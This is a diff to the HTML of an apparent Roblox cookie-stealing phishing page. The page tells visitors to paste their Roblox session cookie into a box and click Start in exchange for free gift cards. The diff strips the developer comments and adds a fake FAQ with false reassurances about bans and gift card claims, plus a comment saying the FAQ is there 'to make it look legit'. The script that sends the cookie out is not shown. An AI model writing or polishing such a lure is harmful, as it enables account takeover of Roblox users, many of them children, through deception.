--- a/index.html
+++ b/index.html
@@ -17,17 +17,28 @@
   <h2>2. Paste Your Roblox Cookie Into The Text Bar Below.</h2>
   <h2>3. Click "Start"</h2>
   <p id="CookieError">ㅤ</p>
-  <div id="container"> <!--div is jus to align the designs in da middle-->
+  <div id="container">
     <p><input id="CookieInput" placeholder="Enter Your Cookie Here."></input></p>
     <p><button id="start" onclick="Send()">Start</button></p>
     <a>ㅤ</a>
-    <p>How to Get Your Roblox Cookie</p>
+    <p>How to Get Your Roblox Cookie:</p>
     <video controls>
-      <source src="https://pawotest.000webhostapp.com/Tutorial.mp4"> <!--how to get your cookie video, u can replace with vid if u want-->
+      <source src="https://pawotest.000webhostapp.com/Tutorial.mp4">
     </video>
-    <img src="https://pawotest.000webhostapp.com/Design.jpg"></img> <!--roblox giftcard image-->
+    <img src="https://pawotest.000webhostapp.com/Design.jpg"></img>
   </div>
+  <h1>FAQ</h1>
+  <br>
+  <h2>How Does This Work?</h2>
+  <h3>Using Your Roblox Cookie It, Access Your Account <br> And Automatically Claims All Available Working Gift Cards.</h3>
+  <br>
+  <h2>Will I Get Banned?</h2>
+  <h3>The Chances Of You Getting Banned Are Small. <br> We Make Sure The Chances Of Your Account <br>Being Banned Are Small.</h3>
+  <br>
+  <h2>How Do I Get Started?</h2>
+  <h3>Follow The Instructions Above. The Video Above Also Helps. <br>For More Help, Contact sigma#4268 On Discord!</h3>
 </body>
 </html>
 
+<!--Added a FAQ part to make it look legit. You can Change it if u want-->
 <!--sigma#4268 aka xyz-->
